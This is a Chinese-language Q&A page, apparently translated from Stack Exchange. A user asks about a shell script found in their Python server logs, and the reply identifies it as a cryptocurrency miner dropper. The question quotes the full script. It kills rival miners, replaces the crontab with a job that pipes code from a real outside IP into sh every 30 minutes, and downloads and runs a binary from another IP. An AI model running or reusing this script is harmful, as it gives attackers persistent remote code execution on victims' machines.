bash - 发现这个 shell 脚本是在我的 python 服务器日志中执行的。谁能告诉我它的目的?
问题描述
下面的代码显示在我的 Ubuntu 20.04 Linux 桌面系统上的 python3 服务器日志中。这只是我多疑的天性,还是试图破解我的电脑?
cc=http://31.42.177.123
sys=sysrv005
bit=$(getconf LONG_BIT)
ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep 'sysrv001|sysrv002|sysrv003|sysrv004|network01|network00' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %
crontab -r
echo "*/30 * * * * (curl --user-agent curl_cron $cc||wget --user-agent wget_cron -q -O - $cc)|sh" | crontab -
#pkill -9 $sys
get() {
chattr -i $2; rm -rf $2
curl --user-agent curl_ldr$bit -fsSL $1 > $2 || wget --user-agent wget_ldr$bit -q -O - $1 > $2 || php -r "file_put_contents('$2', file_get_contents('$1'));"
chmod +x $2
}
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
ps -fe | grep $sys | grep -v grep; if [ $? -ne 0 ]; then
get 31.210.20.120/sysrvv $sys; ./$sys
fi
解决方案
是的,它是比特币矿工。
31.42.177.123/...基本上是下载上面的shell脚本,指向31.210.20.120下载sysrvv文件,这是一个比特币矿工。
推荐阅读
- django - 即使所需图表字段未明确设置,也会创建实例
- wolfram-mathematica - 在模块内使用 For 循环迭代排列时出现问题
- python - Django cron 运行多次,但不应该
- android - 当我按下停止按钮或搜索栏到达末尾时,此应用程序停止工作
- c# - 为什么我的 React 按钮只工作一次然后停止?
- powershell - 如何通过 Add-UnifiedGroupLinks -Identity 传递数组?
- c# - 如何在 WebApi 中返回自定义错误响应
- java - 如何使用 android FusedLocationProviderClient 获得大于 1m 的位置精度?
- c# - 在 C# 中将列表转换为 3D 数组
- sql - 将txt文件导入sql表